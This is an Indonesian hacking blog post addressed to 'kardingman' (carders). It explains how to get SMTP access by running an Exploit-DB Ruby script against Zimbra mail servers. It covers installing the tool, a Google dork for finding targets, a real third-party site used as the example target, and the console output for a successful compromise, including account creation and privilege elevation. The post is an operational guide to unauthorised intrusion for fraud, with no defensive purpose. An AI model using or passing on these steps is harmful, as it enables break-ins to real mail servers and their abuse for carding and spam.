Tutor Mencari SMTP

Tutor Mencari SMTP By Admin KrakenHack

Cara Mencarinya Dengan Exploit Zimbra
SMTP Yaps Singkatan Dari Send Mail To Protocol 
Untuk Para Kardingman Pasti Paham ☺

Tools Download : 
[-] Aplikasi Ruby 
[-] Exploit DB 

Langkah Installasi dan Cara Command Di CMD ( Command Prompt ) :

• Instal ruby samapai selesai di program files c:\
• Download exploit db nya
• Setalah di download jang lupa extrak file nya di program file ruby
• ruby - bin; extrak di situ
• Buka cmd
• Jalan kan perintah nya  
• "cd c:\ruby\bin" *tanpakutip
• ruby run.rb -t http://www.target.com

Untuk mencari target butuh dork zimbra, Disini Cuma Dikasih 1 Dork
 
Dork :
[-] inurl:"web client zimbra login"

Untuk dork lain silahkan mencari dan mengembangkan dork sendiri ☺

Langkah mencari target :

• Buka google.com
• Masukkan dork diatas tadi kedalam google
• Contoh : http://www.linuxquestions.org/questions/linux-server-73/customize-zimbra-web-client-login-screen-in-v8-4175450789/
  ambil website domainnya saja, http://www.linuxquestions.org
• Copy dan Paste di cmd yang tadi sudah diberi perintah, c:/ruby/bin>ruby run.rb -t  http://www.linuxquestions.org
• Kemudian liat hasilnya

Jika sukses ada notice sepeti ini di cmd :
[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges

Contoh Sukses :

Jika Image Rusak Klik Here

NB :
- Untuk nama folder "ruby" *tanpakutip (huruf kecil)
- Wajib install di Local disk C

Reshare From : C3
Credit : Khalfin Mohamad Fadillah ( ./Syko )

By ZX Studios - 1:46 PM - 3 Comments